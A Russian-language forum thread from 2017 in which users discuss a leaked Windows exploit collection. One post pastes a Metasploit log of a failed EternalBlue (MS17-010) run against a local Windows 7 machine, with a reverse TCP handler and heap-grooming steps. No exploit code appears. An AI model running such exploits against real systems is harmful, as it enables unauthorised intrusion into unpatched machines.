HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 27.05.2017, 02:03
ACat
Guest
Сообщений: n/a
Провел на форуме:
60408

Репутация: 0
По умолчанию

Всем привет.

Кто-то сталкивался с сабжем?

В двух словах: сборка сплоитов под винду, которую стырили у зарубежных спец. служб.

В интернете нашёл описание лишь на 2 сплоита, и то не 1 не сработал в условиях локалки.

Скачать можно было на гитхабе.
 
Ответить с цитированием

  #2  
Старый 27.05.2017, 15:45
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от ACat  
ACat said:

Всем привет.
Кто-то сталкивался с сабжем?
В двух словах: сборка сплоитов под винду, которую стырили у зарубежных спец. служб.
В интернете нашёл описание лишь на 2 сплоита, и то не 1 не сработал в условиях локалки.
Скачать можно было на гитхабе.
Скажи свой IP, проверю!
 
Ответить с цитированием

  #3  
Старый 27.05.2017, 16:27
ACat
Guest
Сообщений: n/a
Провел на форуме:
60408

Репутация: 0
По умолчанию

Цитата:
Сообщение от winstrool  
winstrool said:

Скажи свой IP, проверю!
https://s17.postimg.org/61q4nlqz3/image.png

__________________________________________________ _________________________

У меня сабж не сработал...

Цитата:
Сообщение от None  
msf exploit(ms17_010_eternalblue) > exploit[*] Started reverse TCP handler on 192.168.0.102:4444[*] 192.168.0.101:445 - Connecting to target for exploitation.
[+] 192.168.0.101:445 - Connection established for exploitation.[*] 192.168.0.101:445 - Target OS selected valid for OS indicated by SMB reply[*] 192.168.0.101:445 - CORE raw buffer dump (27 bytes)[*] 192.168.0.101:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 50 Windows 7 Home P[*] 192.168.0.101:445 - 0x00000010 72 65 6d 69 75 6d 20 36 2e 31 00 remium 6.1[*] 192.168.0.101:445 - Trying exploit with 12 Groom Allocations.[*] 192.168.0.101:445 - Sending all but last fragment of exploit packet[*] 192.168.0.101:445 - Starting non-paged pool grooming
[+] 192.168.0.101:445 - Sending SMBv2 buffers
[+] 192.168.0.101:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.[*] 192.168.0.101:445 - Sending final SMBv2 buffers.[*] 192.168.0.101:445 - Sending last fragment of exploit packet![*] 192.168.0.101:445 - Receiving response from exploit packet
[-] 192.168.0.101:445 - Did not receive a response from exploit packet[*] 192.168.0.101:445 - Sending egg to corrupted connection.
[-] 192.168.0.101:445 - Errno::ECONNRESET: Connection reset by peer[*] Exploit completed, but no session was created.
Может у тебя сработает...
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ